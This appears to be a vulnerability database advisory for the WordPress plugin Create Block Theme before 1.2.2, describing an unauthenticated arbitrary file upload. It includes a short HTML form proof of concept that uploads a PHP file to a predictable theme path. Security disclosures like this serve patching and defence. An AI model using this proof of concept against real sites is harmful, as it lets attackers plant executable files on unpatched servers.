Create Block Theme < 1.2.2 – Unauthenticated Arbitrary File Upload | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks, as well as does not validate the file to be uploaded, which could allow unauthenticated attackers to upload arbitrary files to the server

Proof of Concept

As unauthenticated user, open

<form action="https://example.com/wp-admin/admin-post.php" method="POST" enctype="multipart/form-data">
<input type="file" name="font-file" />
<input type="text" name="font-name" value="1"/>
<input type="text" name="font-weight" value="1"/>
<input type="text" name="font-style" value="1"/>
<input type="submit" value="Upload" />

The file will be uploaded at https://example.com/wp-content/themes/twentytwentyone/assets/fonts/1_1_1.php (assuming the twentytwentyone theme is installed)

Affects Plugins

create-block-theme

Fixed in 1.2.2

References

URL

https://www.pluginvulnerabilities.com/2022/10/05/our-proactive-monitoring-caught-an-arbitrary-file-upload-vulnerability-in-create-block-theme/

Miscellaneous

Original Researcher

Plugin Vulnerabilities

Submitter website

https://www.pluginvulnerabilities.com/

Verified

Yes

WPVDB ID

3bcabe5d-3fd8-42bd-8a80-2527a6d07a7c

Timeline

Publicly Published

2022-10-05 (about 3 years ago)

Added

2022-10-05 (about 3 years ago)

Last Updated

2022-10-12 (about 3 years ago)

Other

Published

Title

Published

2024-06-14

Title

FooEvents for WooCommerce < 1.19.21 - Improper Authorization to (Contributor+) Arbitrary File Upload

Published

2025-02-17

Title

Everest Forms < 3.0.9.5 - Unauthenticated Arbitrary File Upload, Read, and Deletion

Published

2014-08-01

Title

RokBox <= 2.13 - thumb.php src Parameter Arbitrary File Upload

Published

2025-05-20

Title

Axle Demo Importer <= 1.0.3 - Author+ Arbitrary File Upload

Published

2024-11-25

Title

Booking calendar, Appointment Booking System < 3.2.16 - Unauthenticated Stored Cross-Site Scripting via SVG File Upload